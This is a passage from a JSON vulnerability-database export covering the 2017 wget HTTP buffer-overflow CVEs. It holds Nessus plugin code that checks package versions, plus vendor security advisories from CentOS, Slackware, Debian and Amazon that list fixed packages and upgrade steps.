exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"wget-1.14-15.1.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T17:08:17", "references": ["https://packages.debian.org/source/jessie/wget", "https://packages.debian.org/source/stretch/wget", "https://www.debian.org/security/2017/dsa-4008"], "pluginID": "104223", "description": "Antti Levomaeki, Christian Jalio, Joonas Pihlaja and Juhani Eronen discovered two buffer overflows in the HTTP protocol handler of the Wget download tool, which could result in the execution of arbitrary code when connecting to a malicious HTTP server.", "edition": 7, "reporter": "Tenable", "published": "2017-10-30T00:00:00", "title": "Debian DSA-4008-1 : wget - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:wget", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4008.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4008. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104223);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"DSA\", value:\"4008\");\n\n script_name(english:\"Debian DSA-4008-1 : wget - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Antti Levomaeki, Christian Jalio, Joonas Pihlaja and Juhani Eronen\ndiscovered two buffer overflows in the HTTP protocol handler of the\nWget download tool, which could result in the execution of arbitrary\ncode when connecting to a malicious HTTP server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/wget\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/wget\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-4008\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wget packages.\n\nFor the oldstable distribution (jessie), these problems have been\nfixed in version 1.16-1+deb8u4.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 1.18-5+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"wget\", reference:\"1.16-1+deb8u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"wget\", reference:\"1.18-5+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"wget-udeb\", reference:\"1.18-5+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-29T19:35:56", "references": ["http://www.nessus.org/u?9933c835", "https://access.redhat.com/errata/RHSA-2017:3075"], "pluginID": "119236", "description": "An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* A stack-based and a heap-based buffer overflow flaws were found in wget when processing chunked encoded HTTP responses. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit these flaws to potentially execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these issues.\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-11-27T00:00:00", "title": "Virtuozzo 7 : wget (VZLSA-2017-3075)", "type": "nessus", "enchantments": {"score": {"modified": "2018-11-29T19:35:56", "vector": "NONE", "value": 7.5}}, "naslFamily": "Virtuozzo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-11-27T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:wget"], "id": "VIRTUOZZO_VZLSA-2017-3075.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119236", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119236);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/11/27 13:31:29\");\n\n script_cve_id(\n \"CVE-2017-13089\",\n \"CVE-2017-13090\"\n );\n\n script_name(english:\"Virtuozzo 7 : wget (VZLSA-2017-3075)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* A stack-based and a heap-based buffer overflow flaws were found in\nwget when processing chunked encoded HTTP responses. By tricking an\nunsuspecting user into connecting to a malicious HTTP server, an\nattacker could exploit these flaws to potentially execute arbitrary\ncode. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these\nissues.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-3075.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9933c835\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:3075\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"wget-1.14-15.vl7.1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-11-18T12:42:32", "references": ["https://access.redhat.com/errata/RHSA-2017:3075"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.14-15.el7_4.1", "packageName": "wget", "packageFilename": "wget-1.14-15.el7_4.1.src.rpm", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.14-15.el7_4.1", "packageName": "wget", "packageFilename": "wget-1.14-15.el7_4.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2017:3075\n\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* A stack-based and a heap-based buffer overflow flaws were found in wget when processing chunked encoded HTTP responses. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit these flaws to potentially execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-October/022609.html\n\n**Affected packages:**\nwget\n\n**Upstream details at:**\n", "edition": 2, "reporter": "CentOS Project", "published": "2017-10-27T11:02:39", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "centos", "title": "wget security update", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-27T11:02:39", "href": "http://lists.centos.org/pipermail/centos-announce/2017-October/022609.html", "id": "CESA-2017:3075", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:49", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "1.19.2", "arch": "x86_64", "packageFilename": "wget-1.19.2-x86_64-1_slack13.37.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "1.19.2", "arch": "x86_64", "packageFilename": "wget-1.19.2-x86_64-1_slack14.2.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.19.2", "arch": "x86_64", "packageFilename": "wget-1.19.2-x86_64-1_slack14.1.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.19.2", "arch": "x86_64", "packageFilename": "wget-1.19.2-x86_64-1_slack14.0.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "1.19.2", "arch": "i486", "packageFilename": "wget-1.19.2-i486-1_slack13.37.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "1.19.2", "arch": "x86_64", "packageFilename": "wget-1.19.2-x86_64-1_slack13.1.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "1.19.2", "arch": "i486", "packageFilename": "wget-1.19.2-i486-1_slack13.1.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "1.19.2", "arch": "i486", "packageFilename": "wget-1.19.2-i486-1_slack13.0.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "1.19.2", "arch": "i586", "packageFilename": "wget-1.19.2-i586-1_slack14.2.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "1.19.2", "arch": "x86_64", "packageFilename": "wget-1.19.2-x86_64-1_slack13.0.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.19.2", "arch": "i486", "packageFilename": "wget-1.19.2-i486-1_slack14.0.txz", "packageName": "wget", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.19.2", "arch": "i486", "packageFilename": "wget-1.19.2-i486-1_slack14.1.txz", "packageName": "wget", "operator": "lt"}], "description": "New wget packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/wget-1.19.2-i586-1_slack14.2.txz: Upgraded.\n This update fixes stack and heap overflows in in HTTP protocol handling.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13089\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13090\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/wget-1.19.2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/wget-1.19.2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/wget-1.19.2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/wget-1.19.2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/wget-1.19.2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/wget-1.19.2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/wget-1.19.2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/wget-1.19.2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/wget-1.19.2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/wget-1.19.2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/wget-1.19.2-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/wget-1.19.2-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/wget-1.19.2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/wget-1.19.2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n6a2fdea44aeb773a883b8179fa05f8dd wget-1.19.2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n1cbdea2a72f55841ec7497a33a4050d2 wget-1.19.2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n2b931c21e366f28c3ec3d566895808e1 wget-1.19.2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n3a0040373718b879ff81a590821cc957 wget-1.19.2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n63e6d6396de6264109fc5db75a89a1fa wget-1.19.2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n19a525ee83e14446902d4bb4fe0850c8 wget-1.19.2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nc57618f9fa8a13d00989ebf03622803b wget-1.19.2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n4d0fecab36336e9b00f841881852a619 wget-1.19.2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nb32791160dcf03d91721644a2d997c03 wget-1.19.2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nc534b54abed76e5bb452f06cb3fd0f7e wget-1.19.2-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n1d20fe71cba764a5fd516329b3c84043 wget-1.19.2-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n52f27f37dc54642f430790ba1f7ba5db wget-1.19.2-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc528ea9f78c9658d620951fe575e2757 n/wget-1.19.2-i586-1.txz\n\nSlackware x86_64 -current package:\nd3bdaa039410b993ac729bf88c80905f n/wget-1.19.2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg wget-1.19.2-i586-1_slack14.2.txz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2017-10-27T13:55:58", "title": "wget", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-27T13:55:58", "id": "SSA-2017-300-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.534644", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:12:46", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "1.13.4-3+deb7u5", "arch": "all", "packageFilename": "wget_1.13.4-3+deb7u5_all.deb", "packageName": "wget", "operator": "lt"}], "description": "Package : wget\nVersion : 1.13.4-3+deb7u5\nCVE ID : CVE-2017-13089 CVE-2017-13090\n\nCVE-2017-13089\n Fix stack overflow in HTTP protocol handling.\n\nCVE-2017-13090\n Fix heap overflow in HTTP protocol handling.\n\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.13.4-3+deb7u5.\n\nWe recommend that you upgrade your wget packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "reporter": "Debian", "published": "2017-10-27T21:30:31", "title": "[SECURITY] [DLA 1149-1] wget security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:12:46", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-27T21:30:31", "id": "DEBIAN:DLA-1149-1:08CFA", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201710/msg00028.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:33", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "9", "packageVersion": "1.18-5+deb9u1", "arch": "all", "packageFilename": "wget-udeb_1.18-5+deb9u1_all.deb", "packageName": "wget-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.16-1+deb8u4", "arch": "all", "packageFilename": "wget_1.16-1+deb8u4_all.deb", "packageName": "wget", "operator": "lt"}, {"OS": "Debian", "OSVersion": "9", "packageVersion": "1.18-5+deb9u1", "arch": "all", "packageFilename": "wget_1.18-5+deb9u1_all.deb", "packageName": "wget", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4008-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 28, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : wget\nCVE ID : CVE-2017-13089 CVE-2017-13090\n\nAntti Levomaeki, Christian Jalio, Joonas Pihlaja and Juhani Eronen\ndiscovered two buffer overflows in the HTTP protocol handler of the Wget\ndownload tool, which could result in the execution of arbitrary code\nwhen connecting to a malicious HTTP server.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 1.16-1+deb8u4.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.18-5+deb9u1.\n\nWe recommend that you upgrade your wget packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "reporter": "Debian", "published": "2017-10-28T14:36:23", "title": "[SECURITY] [DSA 4008-1] wget security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:33", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-28T14:36:23", "id": "DEBIAN:DSA-4008-1:604F8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00270.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:04", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.18-3.28.amzn1", "arch": "i686", "packageFilename": "wget-debuginfo-1.18-3.28.amzn1.i686.rpm", "packageName": "wget-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.18-3.28.amzn1", "arch": "src", "packageFilename": "wget-1.18-3.28.amzn1.src.rpm", "packageName": "wget", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.18-3.28.amzn1", "arch": "i686", "packageFilename": "wget-1.18-3.28.amzn1.i686.rpm", "packageName": "wget", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.18-3.28.amzn1", "arch": "x86_64", "packageFilename": "wget-debuginfo-1.18-3.28.amzn1.x86_64.rpm", "packageName": "wget-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.18-3.28.amzn1", "arch": "x86_64", "packageFilename": "wget-1.18-3.28.amzn1.x86_64.rpm", "packageName": "wget", "operator": "lt"}], "description": "**Issue Overview:**\n\nHeap-based buffer overflow in HTTP protocol handling \nA heap-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code. ([CVE-2017-13090 __](<https://access.redhat.com/security/cve/CVE-2017-13090>))\n\nStack-based buffer overflow in HTTP protocol handling \nA stack-based buffer overflow when processing chunked, encoded HTTP responses was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code. ([CVE-2017-13089 __](<https://access.redhat.com/security/cve/CVE-2017-13089>))\n\n \n**Affected Packages:** \n\n\nwget\n\n \n**Issue Correction:** \nRun _yum update wget_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n wget-debuginfo-1.18-3.28.amzn1.i686 \n wget-1.18-3.28.amzn1.i686 \n \n src: \n wget-1.18-3.28.amzn1.src \n \n x86_64: \n wget-1.18-3.28.amzn1.x86_64 \n wget-debuginfo-1.18-3.28.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2017-10-26T23:12:00", "title": "Important: wget", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:04", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-26T23:12:00", "id": "ALAS-2017-916", "href": "https://alas.aws.amazon.com/ALAS-2017-916.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:37:48", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.14-15.el7_4.1", "arch": "x86_64", "packageFilename": "wget-1.14-15.el7_4.1.x86_64.rpm", "packageName": "wget", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.14-15.el7_4.1", "arch": "src", "packageFilename": "wget-1.14-15.el7_4.1.src.rpm", "packageName": "wget", "operator": "lt"}], "description": "[1.14-15.1]\n- Fixed various security flaws (CVE-2017-13089, CVE-2017-13090)", "edition": 4, "reporter": "Oracle", "published": "2017-10-26T00:00:00", "title": "wget security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 